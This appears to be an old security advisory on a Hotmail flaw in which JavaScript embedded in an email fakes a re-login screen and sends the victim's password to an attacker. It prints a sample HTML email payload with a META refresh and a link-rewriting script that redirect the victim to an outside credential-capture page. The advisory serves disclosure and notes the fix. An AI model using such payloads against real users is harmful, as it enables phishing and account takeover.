COMMAND
Hotmail
SYSTEMS AFFECTED
Users having inbox on www.hotmail.com
PROBLEM
Tom Cervenka found a serious security hole in Microsoft's Hotmail
service which allows malicious users to easily steal the passwords
of Hotmail users. The exploit involves sending an e-mail message
that contains embedded javascript code. When a Hotmail user views
the message, the javascript code forces the user to re-login to
Hotmail. In doing so, the victim's username and password is sent
to the malicious user by e-mail. See demo at:
http://www.because-we-can.com/hotmail/default.htm
Once a malicious user knows the password to the victim's Hotmail
account, he can assume full control of the account, including the
ability to:
- delete, send, and read the victim's e-mail
- check mail on other mail servers that the victim has
configured for mail-checking
- access the victim's address book
- discover other passwords sent as confirmation of
registration in old e-mails
- change the password of the Hotmail account
The security problem is dangerously easy to take advantage of. A
would-be hacker needs only to embed the javascript code into the
body of an e-mail message using a standard e-mail program such as
Netscape Mail (free). In a working demonstration and full
description of this exploit at URL before, it is shown that
even users without their own internet service provider (ISP) can
steal an arbitrary number of Hotmail passwords by using a free
Geocities account. The "Hot"mail exploit is a serious security
concern for the following reasons:
1.The malicious code runs as soon as e-mail message is viewed
2.The resources required to launch the attack are minnimal and
freely available.
3.The malicious e-mail can be sent from virtually anywhere,
including libraries, internet cafes, or classroom terminals
4.The exploit will work with any javascript-enabled browser,
including the Microsoft Internet Explorer and Netscape
Communicator.
This is a variation on the Spartan Horse announced by Dan Gregorie
over a week ago, and covered on news.com on the 14th. The Spartan
Horse is available for viewing at:
http://www.thetopoftheworld.com
The news.com articles, is at:
http://www.news.com/News/Item/0,4,25274,00.html?st.ne.fd.gif.d
The variation is that the Spartan Horse, as design on the
www.thetopoftheworld.com site mimicks the Windows95/98
Dial-Up-Networking dialog box.
Jonathan James studied Mr. Cervenka's findings and then started to
experiment. There is a way to do this to a browser that has
Javascripting disabled. Just put a META REFRESH tag into the
htmlfile, the URL should point to the URL which contains the
actual capturing and sending of the password/login. This is shown
in an example below. This has been tested on IE 4.0 > and
Netscape 3.0 >. The code below should be inserted into the
mail that is sent to the victim.
<html>
<meta http-equiv="refresh" content="1; url=http://www.because-we-can.com/hotmail/default.htm">
<head></head><body>
<P>Hotmail flaw. (second version)
<script>
errurl="http://http://www.because-we-can.com/hotmail/default.htm";
nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href=errurl;
}
noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href=errurl;
}
</script>
</body>
</html>
It is also now set up a webpage that supplies you with the code:
http://home7.swipnet.se/~w-78566/hotmail/
SOLUTION
Both Microsoft and Hotmail have been notified that a security
problem exists. The following information about the "Hot"Mail
exploit is being made publicly available to speed the process of
fixing the security hole and inform users how they can protect
themselves. It appears that hotmail put a fix in this by
s/<script>/<comment>/ or some variation, when you view a message.